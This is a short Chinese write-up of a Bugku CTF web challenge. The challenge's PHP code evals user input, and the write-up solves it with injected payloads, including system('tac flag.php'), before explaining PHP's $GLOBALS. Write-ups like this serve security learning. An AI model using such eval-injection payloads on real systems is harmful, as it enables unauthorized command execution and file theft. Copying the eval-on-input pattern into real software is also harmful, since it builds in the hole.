ctf地址:https://ctf.bugku.com/challenges/
web8题目:
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
看到这这道我先要想到$GLOBALS,全局变量
没想到,flat不在这里,应该在源码里面
方法1:利用file函数查看源码
hello=file('flag.php')
方法2:show_soure()函数 查看源码
hello=show_source('flag.php')
方法3:利用系统函数
hello=system('tac flag.php')
知识点$GLOBALS
$GLOBALS定义:引用全局作用域中可用的全部变量(一个包含了全部变量的全局组合数组。变量的名字就是数组的键),与所有其他超全局变量不同,$GLOBALS在PHP代码中任何地方总是可用的,自己可以通过打印$GLOBALS这个变量的结果就知道了。
示例 #1 $GLOBALS 范例 <?php function test() { $foo = "local variable"; echo '$foo in global scope: ' . $GLOBALS["foo"] . " "; echo '$foo in current scope: ' . $foo . " "; } $foo = "Example content"; test(); ?> 以上例程的输出类似于: $foo in global scope: Example content $foo in current scope: local variable
示例 #1 $GLOBALS 范例
<?php
function test() {
$foo = "local variable";
echo '$foo in global scope: ' . $GLOBALS["foo"] . "
";
echo '$foo in current scope: ' . $foo . "
";
}
$foo = "Example content";
test();
?>以上例程的输出类似于:
$foo in global scope: Example content $foo in current scope: local variable